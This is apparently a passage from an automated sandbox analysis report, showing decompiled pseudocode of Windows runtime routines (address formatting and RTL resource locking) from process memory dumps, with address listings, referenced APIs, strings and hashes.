                                                                                                                                                                                                              							_t58 = _t58 + 0x10;
                                                                                                                                                                                                              							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                              							_t40 = E00C17707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                                                              							_t58 = _t58 + 0x10;
                                                                                                                                                                                                              							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                                                              						 *_t52 = _t53;
                                                                                                                                                                                                              						if( *_t52 < _t53) {
                                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00BE2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                                                              							_t26 = 0;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return E00BEE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                                                              			}




















                                                                                                                                                                                                              0x00c214c0
                                                                                                                                                                                                              0x00c214cb
                                                                                                                                                                                                              0x00c214d2
                                                                                                                                                                                                              0x00c214d6
                                                                                                                                                                                                              0x00c214da
                                                                                                                                                                                                              0x00c214de
                                                                                                                                                                                                              0x00c214e3
                                                                                                                                                                                                              0x00c2157a
                                                                                                                                                                                                              0x00c2157a
                                                                                                                                                                                                              0x00c214f1
                                                                                                                                                                                                              0x00c214f3
                                                                                                                                                                                                              0x00c4ea0f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4ea15
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4ea15
                                                                                                                                                                                                              0x00c214f9
                                                                                                                                                                                                              0x00c214f9
                                                                                                                                                                                                              0x00c214fe
                                                                                                                                                                                                              0x00c21504
                                                                                                                                                                                                              0x00c4ea1a
                                                                                                                                                                                                              0x00c4ea1f
                                                                                                                                                                                                              0x00c4ea21
                                                                                                                                                                                                              0x00c4ea22
                                                                                                                                                                                                              0x00c4ea27
                                                                                                                                                                                                              0x00c4ea2a
                                                                                                                                                                                                              0x00c4ea2a
                                                                                                                                                                                                              0x00c21515
                                                                                                                                                                                                              0x00c21517
                                                                                                                                                                                                              0x00c2156d
                                                                                                                                                                                                              0x00c21572
                                                                                                                                                                                                              0x00c21575
                                                                                                                                                                                                              0x00c21575
                                                                                                                                                                                                              0x00c2151e
                                                                                                                                                                                                              0x00c4ea50
                                                                                                                                                                                                              0x00c4ea55
                                                                                                                                                                                                              0x00c4ea58
                                                                                                                                                                                                              0x00c4ea58
                                                                                                                                                                                                              0x00c2152e
                                                                                                                                                                                                              0x00c21531
                                                                                                                                                                                                              0x00c21533
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c21535
                                                                                                                                                                                                              0x00c21541
                                                                                                                                                                                                              0x00c21549
                                                                                                                                                                                                              0x00c21549
                                                                                                                                                                                                              0x00c21533
                                                                                                                                                                                                              0x00c214f3
                                                                                                                                                                                                              0x00c21559

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 00C4EA22
                                                                                                                                                                                                                • Part of subcall function 00C213CB: ___swprintf_l.LIBCMT ref: 00C2146B
                                                                                                                                                                                                                • Part of subcall function 00C213CB: ___swprintf_l.LIBCMT ref: 00C21490
                                                                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 00C2156D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                                                              • String ID: %%%u$]:%u$d}w
                                                                                                                                                                                                              • API String ID: 48624451-4058865186
                                                                                                                                                                                                              • Opcode ID: 5c7de65c5ff86e92ec5ca6a659d6b1beee49f7d8483a50ff7ae1574524f9e387
                                                                                                                                                                                                              • Instruction ID: 326d674c4589f1f30ad1822dfc1510001fea8403ebda0faf3ff4a21f42f36e7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7de65c5ff86e92ec5ca6a659d6b1beee49f7d8483a50ff7ae1574524f9e387
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21D5729002299BCB21DE59DC45AEEB3BCFB60700F4841A1FC56D3141DB70DA599BE1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                                              			E00C053A5(signed int _a4, char _a8) {
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t32;
                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				signed int _t42;
                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                                              				signed int _t64;
                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                                              				intOrPtr _t78;
                                                                                                                                                                                                              				signed int* _t79;
                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                              				signed int _t92;
                                                                                                                                                                                                              				void* _t104;
                                                                                                                                                                                                              				void* _t105;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                              				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                              				_t71 = _t64 + 0x28;
                                                                                                                                                                                                              				_push(_t92);
                                                                                                                                                                                                              				if(_t32 < 0) {
                                                                                                                                                                                                              					_t78 =  *[fs:0x18];
                                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                                                              						asm("lock xadd [ecx], eax");
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                              					_push(_t86);
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                              						__eflags = _t32;
                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _a8;
                                                                                                                                                                                                              						if(_a8 == 0) {
                                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                                              							return 0;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                              							_t79 = _t64 + 0x24;
                                                                                                                                                                                                              							_t71 = 1;
                                                                                                                                                                                                              							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                              							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                              							_a4 = _t32;
                                                                                                                                                                                                              							__eflags = _t32;
                                                                                                                                                                                                              							if(_t32 != 0) {
                                                                                                                                                                                                              								L19:
                                                                                                                                                                                                              								_t86 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                                                              									asm("sbb esi, esi");
                                                                                                                                                                                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00cc01c0;
                                                                                                                                                                                                              									_push(_t92);
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_t37 = E00BDF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                                                              									__eflags = _t37 - 0x102;
                                                                                                                                                                                                              									if(_t37 != 0x102) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t71 =  *(_t92 + 4);
                                                                                                                                                                                                              									_t85 =  *_t92;
                                                                                                                                                                                                              									_t51 = E00C24FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                                                              									_push(_t85);
                                                                                                                                                                                                              									_push(_t51);
                                                                                                                                                                                                              									E00C33F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                                                              									E00C33F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                                                              									_t86 = _t86 + 1;
                                                                                                                                                                                                              									_t105 = _t104 + 0x28;
                                                                                                                                                                                                              									__eflags = _t86 - 2;
                                                                                                                                                                                                              									if(__eflags > 0) {
                                                                                                                                                                                                              										E00C6217A(_t71, __eflags, _t64);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_push(0x65);
                                                                                                                                                                                                              									E00C33F92();
                                                                                                                                                                                                              									_t104 = _t105 + 0xc;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _t37;
                                                                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                                                                              									_push(_t37);
                                                                                                                                                                                                              									E00C23915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                                                              									asm("int3");
                                                                                                                                                                                                              									_t40 =  *_t71;
                                                                                                                                                                                                              									 *_t71 = 0;
                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                              										L1:
                                                                                                                                                                                                              										_t42 = E00C05384(_t92 + 0x24);
                                                                                                                                                                                                              										if(_t42 != 0) {
                                                                                                                                                                                                              											goto L31;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											goto L2;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                                                              										_push( &_a4);
                                                                                                                                                                                                              										_push(_t40);
                                                                                                                                                                                                              										_t49 = E00BDF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                                                              										__eflags = _t49;
                                                                                                                                                                                                              										if(__eflags >= 0) {
                                                                                                                                                                                                              											goto L1;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_push(_t49);
                                                                                                                                                                                                              											E00C23915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                                                              											L31:
                                                                                                                                                                                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                              											_push( &_a4);
                                                                                                                                                                                                              											_push(1);
                                                                                                                                                                                                              											_t42 = E00BDF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                              											__eflags = _t42;
                                                                                                                                                                                                              											if(__eflags >= 0) {
                                                                                                                                                                                                              												L2:
                                                                                                                                                                                                              												return _t42;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												_push(_t42);
                                                                                                                                                                                                              												E00C23915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                              												_push( &_a4);
                                                                                                                                                                                                              												_push(1);
                                                                                                                                                                                                              												_t42 = E00BDF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                              												__eflags = _t42;
                                                                                                                                                                                                              												if(__eflags >= 0) {
                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													_push(_t42);
                                                                                                                                                                                                              													_t45 = E00C23915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                              													asm("int3");
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														_t74 = _t45;
                                                                                                                                                                                                              														__eflags = _t45 - 1;
                                                                                                                                                                                                              														if(_t45 != 1) {
                                                                                                                                                                                                              															break;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                                                              														_t45 = _t74;
                                                                                                                                                                                                              														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                              														__eflags = _t45 - _t74;
                                                                                                                                                                                                              														if(_t45 != _t74) {
                                                                                                                                                                                                              															continue;
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															_t46 =  *[fs:0x18];
                                                                                                                                                                                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                                                              															return _t46;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														goto L38;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													E00C05329(_t74, _t92);
                                                                                                                                                                                                              													_push(1);
                                                                                                                                                                                                              													_t48 = E00C053A5(_t92);
                                                                                                                                                                                                              													return _t48;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t71 =  *_t79;
                                                                                                                                                                                                              								__eflags = _t71;
                                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										_t57 = _t71;
                                                                                                                                                                                                              										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                              										__eflags = _t57 - _t71;
                                                                                                                                                                                                              										if(_t57 == _t71) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t71 = _t57;
                                                                                                                                                                                                              										__eflags = _t57;
                                                                                                                                                                                                              										if(_t57 > 0) {
                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t32 = _a4;
                                                                                                                                                                                                              									__eflags = _t71;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L19;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                                                              					_t32 = 0;
                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                              					__eflags = 0;
                                                                                                                                                                                                              					if(0 != 0) {
                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L38:
                                                                                                                                                                                                              			}


























                                                                                                                                                                                                              0x00c053ab
                                                                                                                                                                                                              0x00c053ae
                                                                                                                                                                                                              0x00c053b1
                                                                                                                                                                                                              0x00c053b4
                                                                                                                                                                                                              0x00c053b7
                                                                                                                                                                                                              0x00c205b6
                                                                                                                                                                                                              0x00c205c0
                                                                                                                                                                                                              0x00c205c3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c205c9
                                                                                                                                                                                                              0x00c205c9
                                                                                                                                                                                                              0x00c205cc
                                                                                                                                                                                                              0x00c205d5
                                                                                                                                                                                                              0x00c205d5
                                                                                                                                                                                                              0x00c053bd
                                                                                                                                                                                                              0x00c053bd
                                                                                                                                                                                                              0x00c053bd
                                                                                                                                                                                                              0x00c053be
                                                                                                                                                                                                              0x00c053be
                                                                                                                                                                                                              0x00c053be
                                                                                                                                                                                                              0x00c053c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42269
                                                                                                                                                                                                              0x00c4226d
                                                                                                                                                                                                              0x00c42349
                                                                                                                                                                                                              0x00c4234d
                                                                                                                                                                                                              0x00c42273
                                                                                                                                                                                                              0x00c42276
                                                                                                                                                                                                              0x00c42279
                                                                                                                                                                                                              0x00c4227e
                                                                                                                                                                                                              0x00c42283
                                                                                                                                                                                                              0x00c42287
                                                                                                                                                                                                              0x00c4228a
                                                                                                                                                                                                              0x00c4228d
                                                                                                                                                                                                              0x00c4228f
                                                                                                                                                                                                              0x00c422bc
                                                                                                                                                                                                              0x00c422bc
                                                                                                                                                                                                              0x00c422bc
                                                                                                                                                                                                              0x00c422be
                                                                                                                                                                                                              0x00c422c4
                                                                                                                                                                                                              0x00c422cc
                                                                                                                                                                                                              0x00c422d0
                                                                                                                                                                                                              0x00c422d6
                                                                                                                                                                                                              0x00c422d7
                                                                                                                                                                                                              0x00c422da
                                                                                                                                                                                                              0x00c422df
                                                                                                                                                                                                              0x00c422e4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422e6
                                                                                                                                                                                                              0x00c422e9
                                                                                                                                                                                                              0x00c422f4
                                                                                                                                                                                                              0x00c422f9
                                                                                                                                                                                                              0x00c422fa
                                                                                                                                                                                                              0x00c42305
                                                                                                                                                                                                              0x00c42314
                                                                                                                                                                                                              0x00c42319
                                                                                                                                                                                                              0x00c4231a
                                                                                                                                                                                                              0x00c4231d
                                                                                                                                                                                                              0x00c42320
                                                                                                                                                                                                              0x00c42323
                                                                                                                                                                                                              0x00c42323
                                                                                                                                                                                                              0x00c42328
                                                                                                                                                                                                              0x00c4232d
                                                                                                                                                                                                              0x00c4232f
                                                                                                                                                                                                              0x00c42331
                                                                                                                                                                                                              0x00c42336
                                                                                                                                                                                                              0x00c42336
                                                                                                                                                                                                              0x00c4233b
                                                                                                                                                                                                              0x00c4233d
                                                                                                                                                                                                              0x00c42350
                                                                                                                                                                                                              0x00c42351
                                                                                                                                                                                                              0x00c42356
                                                                                                                                                                                                              0x00c42359
                                                                                                                                                                                                              0x00c42359
                                                                                                                                                                                                              0x00c4235b
                                                                                                                                                                                                              0x00c4235d
                                                                                                                                                                                                              0x00c05367
                                                                                                                                                                                                              0x00c0536b
                                                                                                                                                                                                              0x00c05372
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42363
                                                                                                                                                                                                              0x00c42363
                                                                                                                                                                                                              0x00c42369
                                                                                                                                                                                                              0x00c4236a
                                                                                                                                                                                                              0x00c4236c
                                                                                                                                                                                                              0x00c42371
                                                                                                                                                                                                              0x00c42373
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42379
                                                                                                                                                                                                              0x00c42379
                                                                                                                                                                                                              0x00c4237a
                                                                                                                                                                                                              0x00c4237f
                                                                                                                                                                                                              0x00c4237f
                                                                                                                                                                                                              0x00c42385
                                                                                                                                                                                                              0x00c42386
                                                                                                                                                                                                              0x00c42389
                                                                                                                                                                                                              0x00c4238e
                                                                                                                                                                                                              0x00c42390
                                                                                                                                                                                                              0x00c05378
                                                                                                                                                                                                              0x00c0537c
                                                                                                                                                                                                              0x00c42396
                                                                                                                                                                                                              0x00c42396
                                                                                                                                                                                                              0x00c42397
                                                                                                                                                                                                              0x00c4239c
                                                                                                                                                                                                              0x00c423a2
                                                                                                                                                                                                              0x00c423a3
                                                                                                                                                                                                              0x00c423a6
                                                                                                                                                                                                              0x00c423ab
                                                                                                                                                                                                              0x00c423ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c423b3
                                                                                                                                                                                                              0x00c423b3
                                                                                                                                                                                                              0x00c423b4
                                                                                                                                                                                                              0x00c423b9
                                                                                                                                                                                                              0x00c423ba
                                                                                                                                                                                                              0x00c423ba
                                                                                                                                                                                                              0x00c423bc
                                                                                                                                                                                                              0x00c423bf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c39153
                                                                                                                                                                                                              0x00c39158
                                                                                                                                                                                                              0x00c3915a
                                                                                                                                                                                                              0x00c3915e
                                                                                                                                                                                                              0x00c39160
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c39166
                                                                                                                                                                                                              0x00c39166
                                                                                                                                                                                                              0x00c39171
                                                                                                                                                                                                              0x00c39176
                                                                                                                                                                                                              0x00c39176
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c39160
                                                                                                                                                                                                              0x00c423c6
                                                                                                                                                                                                              0x00c423cb
                                                                                                                                                                                                              0x00c423ce
                                                                                                                                                                                                              0x00c423d7
                                                                                                                                                                                                              0x00c423d7
                                                                                                                                                                                                              0x00c423ad
                                                                                                                                                                                                              0x00c42390
                                                                                                                                                                                                              0x00c42373
                                                                                                                                                                                                              0x00c4233f
                                                                                                                                                                                                              0x00c4233f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4233f
                                                                                                                                                                                                              0x00c42291
                                                                                                                                                                                                              0x00c42291
                                                                                                                                                                                                              0x00c42293
                                                                                                                                                                                                              0x00c42295
                                                                                                                                                                                                              0x00c4229a
                                                                                                                                                                                                              0x00c422a1
                                                                                                                                                                                                              0x00c422a3
                                                                                                                                                                                                              0x00c422a7
                                                                                                                                                                                                              0x00c422a9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422ab
                                                                                                                                                                                                              0x00c422ad
                                                                                                                                                                                                              0x00c422af
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422af
                                                                                                                                                                                                              0x00c422b1
                                                                                                                                                                                                              0x00c422b4
                                                                                                                                                                                                              0x00c422b4
                                                                                                                                                                                                              0x00c422b6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422b6
                                                                                                                                                                                                              0x00c4228f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4226d
                                                                                                                                                                                                              0x00c053cb
                                                                                                                                                                                                              0x00c053ce
                                                                                                                                                                                                              0x00c053d0
                                                                                                                                                                                                              0x00c053d4
                                                                                                                                                                                                              0x00c053d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c053d8
                                                                                                                                                                                                              0x00c053e3
                                                                                                                                                                                                              0x00c053ea
                                                                                                                                                                                                              0x00c053ea
                                                                                                                                                                                                              0x00c053d6
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C422F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • RTL: Resource at %p, xrefs: 00C4230B
                                                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C422FC
                                                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 00C42328
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                              • API String ID: 885266447-871070163
                                                                                                                                                                                                              • Opcode ID: 71428d786801a77c478ea728adca390581db31b68ab290742b40c3da4f866746
                                                                                                                                                                                                              • Instruction ID: 7f99d680535ba4633f67820f02a01c35428a4ceb9054859818b146f9b1d8528c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71428d786801a77c478ea728adca390581db31b68ab290742b40c3da4f866746
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB5127716007126BDB209F28CC82FA773ECEF54360F104269FD54DB291E6A5EE41DBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                              			E00C0EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                              				short _v66;
                                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                              				intOrPtr _t48;
                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                              				signed char _t67;
                                                                                                                                                                                                              				void* _t72;
                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                              				intOrPtr* _t80;
                                                                                                                                                                                                              				intOrPtr _t84;
                                                                                                                                                                                                              				intOrPtr* _t85;
                                                                                                                                                                                                              				void* _t91;
                                                                                                                                                                                                              				void* _t92;
                                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t80 = __edi;
                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                              				_t70 = __ecx;
                                                                                                                                                                                                              				_t84 = _a4;
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                                                              					E00BFDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                                                              					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                                              				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                                                              				if(_t38 == 0xffffffff) {
                                                                                                                                                                                                              					_t39 =  *0xcc793c; // 0x0
                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                              					_push(_t84);
                                                                                                                                                                                                              					_t40 = E00BE16C0(_t39);
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t40 = E00BDF9D4(_t38);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_pop(_t85);
                                                                                                                                                                                                              				__eflags = _t40;
                                                                                                                                                                                                              				if(__eflags < 0) {
                                                                                                                                                                                                              					_push(_t40);
                                                                                                                                                                                                              					E00C23915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                                                              					asm("int3");
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L21:
                                                                                                                                                                                                              						_t76 =  *[fs:0x18];
